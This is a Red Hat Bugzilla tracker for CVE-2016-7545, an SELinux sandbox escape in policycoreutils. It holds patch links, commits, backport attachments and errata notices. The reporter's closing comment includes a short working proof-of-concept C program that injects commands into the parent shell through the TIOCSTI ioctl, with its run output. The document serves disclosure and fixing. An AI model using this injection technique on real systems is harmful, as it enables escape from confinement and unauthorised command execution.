Bug 1378577 (CVE-2016-7545)
| Summary: | CVE-2016-7545 policycoreutils: SELinux sandbox escape via TIOCSTI ioctl | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Federico Manuel Bento <up201407890> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | unspecified | CC: | cbuissar, cperry, dwalsh, kdudka, lvrabec, mgrepl, mmalik, plautrba, pmoore, redhat-bugzilla, security-response-team, ssekidde, vmojzis, wmealing, yozone |
| Target Milestone: | --- | Keywords: | Reopened, Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | If docs needed, set a value | |
| Doc Text: |
It was found that the sandbox tool provided in policycoreutils was vulnerable to a TIOCSTI ioctl attack. A specially crafted program executed via the sandbox command could use this flaw to execute arbitrary commands in the context of the parent shell, escaping the sandbox.
|
Story Points: | --- |
| Clone Of: | Environment: | ||
| Last Closed: | 2017-03-15 14:17:34 UTC | Type: | Bug |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | 1378932, 1380733, 1380734, 1380735, 1380736, 1429954, 1429955 | ||
| Bug Blocks: | 1378931 | ||
| Attachments: | |||
Upstream mailing list discussion: * https://marc.info/?t=147463464400001&r=1&w=2 Created policycoreutils tracking bugs for this issue: Affects: fedora-all [bug 1378932] Upstream fixes: * https://marc.info/?l=selinux&m=147465156612756&w=2 * https://marc.info/?l=selinux&m=147466045909969&w=2 This was assigned CVE-2016-7545. References: http://seclists.org/oss-sec/2016/q3/606 (In reply to Paul Moore from comment #4) > Upstream fixes: > > * https://marc.info/?l=selinux&m=147465156612756&w=2 To be clear, the patch above is not strictly necessary, but very helpful. commit 5b98f39de5119dcc865f6c7923682fb10219d45a Author: Petr Lautrbach <plautrba> Date: Fri Sep 23 19:24:15 2016 +0200 sandbox: do not try setup directories without -X or -M sandbox tried to copy all affected files to the new home or tmp even though -M or -X was not specified and there was no new directory. Fixes: $ sandbox ls ~ /usr/bin/sandbox: [Errno 17] File exists: '/root' Signed-off-by: Petr Lautrbach <plautrba> > * https://marc.info/?l=selinux&m=147466045909969&w=2 This is the patch that fixes the vulnerability. commit acca96a135a4d2a028ba9b636886af99c0915379 Author: Petr Lautrbach <plautrba> Date: Fri Sep 23 19:24:16 2016 +0200 sandbox: create a new session for sandboxed processes It helps to prevent sandboxed processes to inject arbitrary commands into the parent. Signed-off-by: Petr Lautrbach <plautrba> Created attachment 1205640 [details]
Basic SRPM patch against Rawhide (no changelog or rev bumps)
Created attachment 1205641 [details] Rawhide patch (policycoreutils-2.5-17.fc26.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848819 Created attachment 1205642 [details] F25 patch (policycoreutils-2.5-17.fc25.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848928 Created attachment 1205646 [details] F24 patch (policycoreutils-2.5-14.fc24.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849131 Created attachment 1205663 [details] F23 patch (policycoreutils-2.4-22.fc23.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849416 Created attachment 1205679 [details]
RHEL-7.3 patch (policycoreutils-2.5-9.el7.src.rpm)
Created attachment 1205701 [details]
RHEL-6.9 patch (policycoreutils-2.0.83-30.el6.src.rpm)
NOTE: It looks like we did not backport the SELinux sandbox code to RHEL-5.x. NOTE: While I've backported and done scratch builds for Rawhide, F25, F24, F23, RHEL-7.3, and RHEL-6.9, I haven't yet had a chance to verify these patches/builds. This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 6 Via RHSA-2016:2702 https://rhn.redhat.com/errata/RHSA-2016-2702.html This issue has been addressed in the following products: Red Hat Enterprise Linux 7.1 Extended Update Support Via RHSA-2017:0536 https://rhn.redhat.com/errata/RHSA-2017-0536.html This issue has been addressed in the following products: Red Hat Enterprise Linux 7.2 Extended Update Support Via RHSA-2017:0535 https://rhn.redhat.com/errata/RHSA-2017-0535.html |
Hi, When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. $ cat test.c #include <unistd.h> #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o test $ /bin/sandbox ./test id uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176 [saken@ghetto ~]$ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 This is similar to CVE-2016-2568, CVE-2016-2779, etc. Thanks, Federico Bento.